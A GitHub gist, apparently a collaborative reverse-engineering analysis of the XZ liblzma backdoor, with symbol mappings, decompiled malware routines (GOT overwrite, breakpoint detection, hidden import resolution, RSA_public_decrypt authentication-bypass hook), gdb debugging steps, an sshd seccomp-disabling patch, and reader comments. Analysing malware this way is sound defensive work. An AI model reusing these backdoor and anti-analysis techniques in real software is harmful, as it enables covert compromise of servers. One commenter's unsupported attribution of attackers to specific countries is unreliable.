Skip to content

Instantly share code, notes, and snippets.

@smx-smx
Last active October 12, 2024 07:23
Show Gist options
  • Save smx-smx/a6112d54777845d389bd7126d6e9f504 to your computer and use it in GitHub Desktop.
Save smx-smx/a6112d54777845d389bd7126d6e9f504 to your computer and use it in GitHub Desktop.
[WIP] XZ Backdoor Analysis and symbol mapping

Discord Room for discussion

https://discord.com/invite/maFYmgQkYH

Github repository:

https://github.com/smx-smx/xzre

Init routines
  • Llzma_delta_props_decoder -> backdoor_ctx_save
  • Llzma_block_param_encoder_0 -> backdoor_init
  • Llzma_delta_props_encoder -> backdoor_init_stage2

  • Llzip_decode_1 -> table1

  • Lcrc64_clmul_1 -> table2

  • Llz_stream_decode -> count_1_bits

  • Lsimple_coder_update_0 -> table_get

    • Retrieves the index of the encoded string given the plaintext string in memory
  • Lcrc_init_0 -> import_lookup

  • .Lcrc64_generic.0 -> import_lookup_ex


Anti RE and x64 code Dasm
  • Llzma_block_buffer_encode_0 -> check_software_breakpoint

  • Lx86_code_part_0 -> code_dasm

  • Llzma_index_iter_rewind_cold -> check_return_address

    • Checks if the return address has been tampered with. This function is called at the beginning of a "protected" function. If the check fails, the function returns early without doing anything

  • Llzma_delta_decoder_init_part_0 -> backdoor_vtbl_init

    • It sets up a vtable with core functions used by the backdoor
  • Lstream_decoder_memconfig_part_1 -> get_lzma_allocator

  • Llzma_simple_props_encode_1 -> j_tls_get_addr

  • Llzma_block_uncomp_encode_0 -> rodata_ptr_offset

  • Llzma12_coder_1 -> global_ctx


ELF parsing
  • Llzma_filter_decoder_is_supported.part.0 -> parse_elf_invoke

  • Lmicrolzma_encoder_init_1 -> parse_elf_init

  • Lget_literal_price_part_0 -> parse_elf

  • Llzma_stream_header_encode_part_0 -> get_ehdr_address

  • Lparse_bcj_0 -> process_elf_seg

  • Llzma_simple_props_size_part_0 -> is_gnu_relro

Stealthy ELF magic verification
  // locate elf header
  while ( 1 )
  {
    if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300
      break; // found
    ehdr -= 64; // backtrack and try again
    if ( ehdr == start_pointer )
      goto not_found;
  }

  • Llzma_stream_flags_compare_1 -> get_rodata_ptr

Verified or Suspected function hooking
  • Llzma_index_memusage_0 -> apply_entries

  • Llzma_check_init_part_0 -> apply_one_entry

  • Lrc_read_init_part_0 -> apply_one_entry_internal

  • Llzma_lzma_optimum_fast_0 -> install_entries

  • Llzip_decoder_memconfig_part_0 -> installed_func_0

  • Llzma_index_prealloc_0 -> RSA_public_decrypt GOT hook/detour

  • Llzma_index_stream_size_1 -> check_special_rsa_key -> (thanks q3k)

    • Called from Llzma_index_prealloc_0, it checks if the supplied RSA key is the special key to bypass the normal authentication flow
  • Lindex_decode_1 -> installed_func_2

  • Lindex_encode_1 -> installed_func_3

  • Llzma2_decoder_end_1 -> apply_one_entry_ex

  • Llzma2_encoder_init.1 -> apply_method_1

  • Llzma_memlimit_get_1 -> apply_method_2


lzma allocator / call hiding

  • Lstream_decoder_mt_end_0 -> get_lzma_allocator_addr
  • Linit_pric_table_part_1 -> fake_lzma_allocator
  • Lstream_decode_1 -> fake_lzma_free

core functionality
  • Llzma_delta_props_encode_part_0 -> resolve_imports (including system())

  • Llzma_index_stream_flags_0 -> process_shared_libraries

    • Reads the list of loaded libraries through _r_debug->r_map, and calls process_shared_libraries_map to traverse it
  • Llzma_index_encoder_init_1 -> process_shared_libraries_map

    • Traverses the list of loaded libraries, looking for specific libraries
  • func @0x7620 : It does indirect calls on the vtable configured by backdoor_vtbl_init, and is called by the RSA_public_decrypt hook (func#1) upon certain conditions are met

Software Breakpoint check, method 1

This method checks if the instruction endbr64, which is always present at the beginning of every function in the malware, is overwritten. GDB would typically do this when inserting a software breakpoint

/*** address: 0xAB0 ***/
__int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3)
{
  unsigned int v4;

  v4 = 0;
  // [for a3=0xe230], true when *v = 0xfa1e0ff3 (aka endbr64)
  if ( a2 - code_addr > 3 )
    return *code_addr + (a3 | 0x5E20000) == 0xF223;// 5E2E230
  return v4;
}

Function backdoor_init (0xA784)

__int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr)
{
  _DWORD *v2;
  __int64 runtime_offset;
  bool is_cpuid_got_zero;
  void *cpuid_got_ptr;
  __int64 got_value;
  _QWORD *cpuid_got_ptr_1;

  ctx->self = ctx;
  // store data before overwrite
  backdoor_ctx_save(ctx);
  ctx->prev_got_ptr = ctx->got_ptr;
  runtime_offset = ctx->head - ctx->self;
  ctx->runtime_offset = runtime_offset;
  is_cpuid_got_zero = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL;
  cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset;
  ctx->got_ptr = cpuid_got_ptr;
  if ( !is_cpuid_got_zero )
  {
    cpuid_got_ptr_1 = cpuid_got_ptr;
    got_value = *(QWORD *)cpuid_got_ptr;
    // replace with Llzma_delta_props_encoder (backdoor_init_stage2)
    *(QWORD *)cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 2) + runtime_offset;
    // this calls Llzma_delta_props_encoder due to the GOT overwrite
    runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, &Llzma_block_buffer_decode_0, v2);
    // restore original
    *cpuid_got_ptr_1 = got_value;
  }
  return runtime_offset;
}

Function Name matching (function 0x28C0)
str_id = table_get(a6, 0LL);
...
if ( str_id == STR_RSA_public_decrypt_ && v11 )
...
else if ( v13 && str_id == STR_EVP_PKEY_set__RSA_ )
...
else if (str_id != STR_RSA_get__key_ || !v17 )
Hidden calls (via lzma_alloc)

lzma_alloc has the following prototype:

extern void * lzma_alloc (size_t size , const lzma_allocator * allocator )

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i;
  char *mem;

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x180, it gets to 0xCAB0 (Lx86_coder_destroy), Since the caller adds +8, we get to 0xCAB8, which is the lzma_allocator itself
  mem = (char *)Llookup_filter_part_0;
  for ( i = 0; i <= 0xB; ++i )
    mem += 32;
  return mem;
}

The interface for lzma_allocator can be viewed for example here: https://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-L440

Therefore, the allocator is Linit_pric_table_part_1 and free is Lstream_decode_1

  • NOTE: the function used for alloc is very likely import_lookup_ex, which turns lzma_alloc into an import resolution function. this is used a lot in resolve_imports, e.g.:
                  system_func = lzma_alloc(STR_system_, lzma_allocator);
                ctx->system = system_func;
                if ( system_func )
                  ++ctx->num_imports;
                shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator);
                ctx->shutdown = shutdown_func;
                if ( shutdown_func )
                  ++ctx->num_imports;

The third lzma_allocator field, opaque, is abused to pass information about the loaded ELF file to the "fake allocator" function. This is highlighted quite well by function Llzma_index_buffer_encode_0:

__int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx)
{
  _QWORD *lzma_allocator;
  __int64 result;
  __int64 fn_read;
  __int64 fn_errno_location;

  lzma_allocator = get_lzma_allocator();
  result = parse_elf(*p_elf, elf_info);         // reads elf into elf_info
  if ( (_DWORD)result )
  {
    lzma_allocator[2] = elf_info;               // set opaque field to the parsed elf info
    fn_read = lzma_alloc(STR_read_, lzma_allocator);
    ctx->fn_read = fn_read;
    if ( fn_read )
      ++ctx->num_imports;
    fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator);
    ctx->fn_errno_location = fn_errno_location;
    if ( fn_errno_location )
      ++ctx->num_imports;
    return ctx->num_imports == 2; // true if we found both imports
  }
  return result;
}

Note how, instead of size, the malware passes an EncodedStringID instead

Dynamic analysis

Analyzing the initialization routine

  1. Replace the endbr64 in get_cpuid with a jmp . ("\xeb\xfe")
root@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 > liblzma.so.5.6.1
root@debian:~# perl -pe 's/\xF3\x0F\x1E\xFA\x55\x48\x89\xF5\x4C\x89\xCE/\xEB\xFE\x90\x90\x55\x48\x89\xF5\x4C\x89\xCE/g' -i liblzma.so.5.6.1
  1. Force sshd to use the modified library with LD_PRELOAD
# env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h

NOTE: anarazel recommends using LD_LIBRARY_PATH with a symlink instead, since LD_PRELOAD changes the initialization order and could interfere with the normal flow of the malware

2b. or use this gdbinit file to do it all at once

# cat gdbinit
set confirm off
unset env

## comment this out if you don't want to debug the initialization code
## (or use LD_LIBRARY_PATH instead)
set env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1
set env LANG=C
file /usr/sbin/sshd
## start sshd on port 2022
set args -p 2022
set disassembly-flavor intel
set confirm on
set startup-with-shell off

show env
show args

# gdb -x gdbinit
(gdb) r
Starting program: /usr/sbin/sshd -p 222
^C <-- send CTRL-C
Program received signal SIGINT, Interrupt.
0x00007ffff7f8a7f0 in ?? ()
  1. Attach to the frozen process with your favourite debugger (gdb attach pid)
(gdb) bt
#0  0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1
#1  0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1
#2  0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=<optimized out>,
    reloc_addr_arg=0x7f8cb3b3dda0 <lzma_crc32@got[plt]>,
    version=<optimized out>, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8,
    scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170)
    at ../sysdeps/x86_64/dl-machine.h:300
#3  elf_dynamic_do_Rela (skip_ifunc=<optimized out>, lazy=<optimized out>,
    nrelative=<optimized out>, relsize=<optimized out>,
    reladdr=<optimized out>, scope=<optimized out>, map=0x7f8cb3b3f170)
    at ./elf/do-rel.h:147
#4  _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=<optimized out>,
    reloc_mode=<optimized out>, consider_profiling=<optimized out>,
    consider_profiling@entry=0) at ./elf/dl-reloc.c:301
#5  0x00007f8cb3b5e6e9 in dl_main (phdr=<optimized out>, phnum=<optimized out>,
    user_entry=<optimized out>, auxv=<optimized out>) at ./elf/rtld.c:2318
#6  0x00007f8cb3b5af0f in _dl_sysdep_start (
    start_argptr=start_argptr@entry=0x7ffe17e402e0,
    dl_main=dl_main@entry=0x7f8cb3b5c900 <dl_main>)
    at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140
#7  0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0)
    at ./elf/rtld.c:498
#8  _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585
#9  0x00007f8cb3b5b4d8 in _start () from /lib64/ld-li
nux-x86-64.so.2
#10 0x0000000000000002 in ?? ()
#11 0x00007ffe17e40fa1 in ?? ()
#12 0x00007ffe17e40fb0 in ?? ()
#13 0x0000000000000000 in ?? ()

NOTE: _get_cpuid will call function 0xA710, whose purpose is to detect if we're at the right point to initialize the backdoor Why? Because elf_machine_rela will call _get_cpuid for both lzma_crc32 and lzma_crc64. Since the modified code is part of lzma_crc64, 0xA710 has a simple call counter in it to trace how many times it has been called, and make sure the modification doesn't trigger for lzma_crc32.

  • first call (0): -> lzma_crc32
  • second call (1): -> lzma_crc64
  if ( call_counter == 1 )
  {
    /** NOTE: some of these fields are unverified and guessed **/
    rootkit_ctx.head = 1LL;
    memset(&rootkit_ctx.runtime_offset, 0, 32);
    rootkit_ctx.prev_got_ptr = prev_got_ptr;
    backdoor_init(&rootkit_ctx, prev_got_ptr);  // replace cpuid got entry
  }
  ++call_counter;
  cpuid(a1, &v5, &v6, &v7, &rootkit_ctx);
  return v5;
}

At this point, you can issue detach and attach with other debuggers if needed.

Once attached, set relevant breakpoints and restore the original bytes ("\xF3\x0F\x1E\xFA")

breakpoint on RSA_public_decrypt hook

Run this gdb script on the sshd listener process (this new gdbinit script should account for eventual differences in library load address - it didn't happen for me in the first tests but it did later on)

set pagination off
set follow-fork-mode child
catch load
# now we forked, wait for lzma
catch load liblzma
c
# now we have lzma
# 0x12750: offset from base
hbreak *(lzma_crc32 - 0x2640 + 0x12750)
set disassembly-flavor intel
set pagination on
c

Now connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4

...
Thread 3.1 "sshd" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
(gdb) bt
#0  0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
#1  0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 <-- Llzma_index_prealloc_0 (offset 0x48 in vtable)
#2  0x00005555556bdd00 in ?? ()
#3  0x0000000100000004 in ?? ()
#4  0x00007fffffffdeb0 in ?? ()
#5  0x00000001f74b5d7a in ?? ()
#6  0x0000000000000000 in ?? ()
RSA_public_decrypt GOT hook (Llzma_index_prealloc_0)
  /** the following happens during pubkey login **/
  
  params[0] = 1;                                // should we call original?
  // this call checks if the supplied RSA key is special
  result = installed_func_1(rsa_key, global_ctx, params); 
  // if still 1, the payload didn't trigger, call the original function
  // if 0, bypass validation
  if ( params[0] ) 
    return real_RSA_public_decrypt(flen, from, to, rsa_key);
  return result;

Binary patch for sshd to disable seccomp and chroot (allows Frida tracing of [net] processes)

> fc /b sshd sshd_patched
Comparing files sshd sshd_patched
0001332A: 75 90 
0001332B: 6D 90
----
0004FC24: 41 C3
0004FC25: 54 90
----
00109010: 01 00
XZ Backdoor symbol deobfuscation. Updated as i make progress
@q3k
Copy link

q3k commented Mar 30, 2024

Llzma_index_stream_size_1 / installed_func_1 is the RSA_public_decrypt hook/detour.

@lockness-Ko
Copy link

Currently working on making a honeypot to detect who is poking this backdoor! Your analysis has been amazingly helpful! If you haven't already, take a look at bpftrace's uprobes and uretprobes for hooking functions. https://github.com/bpftrace/bpftrace/blob/master/man/adoc/bpftrace.adoc#probes

https://github.com/lockness-Ko/xz-vulnerable-honeypot

@Klotzi111
Copy link

I have not looked in the binary myself yet.
I am wondering are the symbol names actually backdoor_ctx_save and backdoor_init? Or are these name from you?
Because if those are the original names: Why would he call them backdoor? Thats not very clever. Could have been easily found by dumping all symbols.

@Trimester6
Copy link

Trimester6 commented Mar 31, 2024

Currently working on making a honeypot to detect who is poking this backdoor!

It's easy, CN and SG, simple as, they will route to SG if CN is geofenced

@smx-smx
Copy link
Author

smx-smx commented Mar 31, 2024

I have not looked in the binary myself yet. I am wondering are the symbol names actually backdoor_ctx_save and backdoor_init? Or are these name from you? Because if those are the original names: Why would he call them backdoor? Thats not very clever. Could have been easily found by dumping all symbols.

Nobody has the original names (if they do, they are in Jia Tan's crew).
I am reconstructing/guessing them by looking at the disassembled code (statically/dynamically).

@NuLL3rr0r
Copy link

NuLL3rr0r commented Mar 31, 2024

No doubt the malicious actor is smart enough to steal someone else's identity.

@ItzSwirlz
Copy link

ItzSwirlz commented Mar 31, 2024

Taking a look now, thanks for documenting this so I can find a place to start.

.Llzma_index_init.0 seems to be the thing seeing if installed function 1 is not there yet. - proposed name: apply_rsa_decrypt?

void .Llzma_index_init.0(long param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4)

{
  code *UNRECOVERED_JUMPTABLE;
  undefined4 local_1c;
  
  if (((global_ctx != (rootkit_ctx *)0x0) && (global_ctx->runtime_offset != 0)) &&
     (UNRECOVERED_JUMPTABLE = *(code **)(global_ctx->runtime_offset + 0x10),
     UNRECOVERED_JUMPTABLE != (code *)0x0)) {
    if (param_1 != 0) {
      RSA_public_decrypt(param_1,(long)global_ctx,&local_1c);
    }
                    /* WARNING: Could not recover jumptable at 0x0010a3b4. Too many branches */
                    /* WARNING: Treating indirect jump as call */
    (*UNRECOVERED_JUMPTABLE)(param_1,param_2,param_3,param_4);
    return;
  }
  return;
}

@ItzSwirlz
Copy link

ItzSwirlz commented Mar 31, 2024

.text.parse_optiona, at 00107050, and in fake function .Llzma12_mode_map.part1, before calling table_get in a while loop, it calls what I've named table_get_first_empty_index:

long table_get_first_empty_index(char *key)

{
  long index;
  
  if (*key != '\0') {
    index = 0;
    do {
      index = index + 1;
    } while (key[index] != '\0');
    return index;
  }
  return 0;
}

.Llzma_index_iter_rewind.cold just applies an entry ("internal")

uint .Llzma_index_iter_rewind.cold(uint param_1,uint param_2,uint param_3,uint param_4)

{
  undefined8 uVar1;
  int *unaff_retaddr;
  
  uVar1 = apply_one_entry_internal(0,unaff_retaddr,param_1,param_2,param_3);
  return (uint)uVar1 | param_4;
}

@oogali
Copy link

oogali commented Mar 31, 2024

_get_cpuid is designed to look similar to __get_cpuid.

The latter takes 5 arguments, as seen at https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/cpuid.h#L67.

The former, which comes from the injected object, file takes 6 arguments, with the latter being an address of a function frame offset.

static inline bool _is_arch_extension_supported(void) {
    int success = 1;
    uint32_t r[4];

    success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
    const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);

    return success && (r[2] & ecx_mask) == ecx_mask;
}

@luvletter2333
Copy link

@smx-smx Hi, I am also working on this and maybe there is an error in your report.

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i; // [rsp+1Ch] [rbp-Ch]
  __int64 v2; // [rsp+20h] [rbp-8h]

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x160, it gets to 0xCA90 (Lx86_coder_destroy), which is subsequently used as scratch space
  // for creating the `lzma_allocator` struct (data starts after 8 bytes, at 0xCA98, which is the beginning of a .data segment)
  v2 = (__int64)Llookup_filter_part_0;
  for ( i = 0; i <= 11; ++i )
    v2 += 32LL;
  return (char *)v2;
}

Actually the loop runs 12 times, so the offset is 12*32 = 0x180.
So this function simply returns the address of _Ldecoder_1 (0xCAF0)

a.rel.ro.decoders0:000000000000CAF0 _Ldecoder_1

The lzma_allocator is at 0xCAF8, so:

alloc is Linit_pric_table_part_1
free is _Lstream_decode_1

@oogali
Copy link

oogali commented Mar 31, 2024

The symbol names extracted from the object file that are not present in the actual project:

  • _get_cpuid
  • crc_init
  • init_pric_table
  • lzma_block_encoder_update

That comes from me manually walking through the symbol reference output of bingrep.

for sym in $(bingrep trojan.o | grep SHT | grep '\.text\.' | grep -v rela | awk '{ print $2 }' | sed 's/\.text\.//; s/.$//' | sort | uniq) ; do
  echo "==> ${sym}"
  grep -r "${sym}" .
  echo 
done | less

@sivizius
Copy link

Did you mean 0xA794 (5.6.1, not sure where it is located in 5.6.0) instead of 0xA7849?

@smx-smx
Copy link
Author

smx-smx commented Mar 31, 2024

@luvletter2333

@smx-smx Hi, I am also working on this and maybe there is an error in your report.

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i; // [rsp+1Ch] [rbp-Ch]
  __int64 v2; // [rsp+20h] [rbp-8h]

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x160, it gets to 0xCA90 (Lx86_coder_destroy), which is subsequently used as scratch space
  // for creating the `lzma_allocator` struct (data starts after 8 bytes, at 0xCA98, which is the beginning of a .data segment)
  v2 = (__int64)Llookup_filter_part_0;
  for ( i = 0; i <= 11; ++i )
    v2 += 32LL;
  return (char *)v2;
}

Actually the loop runs 12 times, so the offset is 12*32 = 0x180. So this function simply returns the address of _Ldecoder_1 (0xCAF0)

a.rel.ro.decoders0:000000000000CAF0 _Ldecoder_1

The lzma_allocator is at 0xCAF8, so:

alloc is Linit_pric_table_part_1 free is _Lstream_decode_1

Oops, you're right, i was off by one.
That's what happens when you've been staring at the thing for too long 🙂 .
Thanks for the correction

@smx-smx
Copy link
Author

smx-smx commented Mar 31, 2024

Did you mean 0xA794 (5.6.1, not sure where it is located in 5.6.0) instead of 0xA7849?

0xA784, the '9' was spurious.
Fixed

@anarazel
Copy link

anarazel commented Mar 31, 2024

Force sshd to use the modified library with LD_PRELOAD
env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h

FWIW, I may have observed some minor behavioral differences between the normal initialization order and when liblzma.so.5.6.1 is loaded earlier due to LD_PRELOAD. Probably just noise, but may be worth to instead use LD_LIBRARY_PATH. Requires a symlink from liblzma.so.5 to to the modified liblzma.so.5.6.1 in the directory with the modified liblzma, of course.

@tux3
Copy link

tux3 commented Mar 31, 2024

To remove the env var and argv0 check, patch function 0x3A10 (in the 5.6.1.o) to always return 1

E.g. an EB F7 on top of xor eax, eax does the trick.

(Note I work directly on a liblzma.so instead of the crc64_fast object, so I'm not 100% sure on the function offsets, but it's the function that does cmp eax, 0x0108)

@sivizius
Copy link

Could you somehow keep track of re-renamings of labels or state the offsets? 👉 👈

@badactress
Copy link

.text.parse_optiona, at 00107050, and in fake function .Llzma12_mode_map.part1, before calling table_get in a while loop, it calls what I've named table_get_first_empty_index:

That's a name based on the context? Otherwise the behaviour looks like strlen().

long table_get_first_empty_index(char *key)

{
  long index;
  
  if (*key != '\0') {
    index = 0;
    do {
      index = index + 1;
    } while (key[index] != '\0');
    return index;
  }
  return 0;
}

@goabout2
Copy link

goabout2 commented Apr 1, 2024

the Dynamic analysis should in debian?

@smx-smx
Copy link
Author

smx-smx commented Apr 1, 2024

the Dynamic analysis should in debian?

Yes, everything was done on Debian Testing

@luvletter2333
Copy link

luvletter2333 commented Apr 2, 2024

I post my analysis at https://github.com/luvletter2333/xz-backdoor-analysis. My analysis is currently limited to the structure and prototype recovering and has not reached the hook part.

@fkirc
Copy link

fkirc commented Apr 2, 2024

Thank you for your analysis.
I have a question regarding the write-execute memory protection:

I understand that xz was mapped into the address-space of sshd. However, I still don’t understand how it is possible to overwrite a function of sshd.
Until now, I thought that all modern Linux-systems are enforcing a write-xor-execute policy: https://en.m.wikipedia.org/wiki/W%5EX
This means that every page of memory could be writable or executable, but not both at the same time.

So how on earth it is possible that some malicious library is overwriting code of sshd?
I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

@PluMGMK
Copy link

PluMGMK commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

@anarazel
Copy link

anarazel commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

@fkirc
Copy link

fkirc commented Apr 3, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

Can you elaborate more about what is a “dl-audit hook“ and how is it possible to overwrite function pointers in the GOT?
How does it even find the GOT of sshd if ASLR is enabled?
I thought that every library has its own GOT and doesn’t know where the GOTs of other libraries are located in the virtual memory?

@step21
Copy link

step21 commented Apr 3, 2024

AFAIK pointers are not ‘overwritten’. This ifunc resolution is ordinarily used to select different functions f e based on the architecture it is run on. So this is a glibc functionality and it doesn’t need to disable aslr or similar.

@Xiphoseer
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment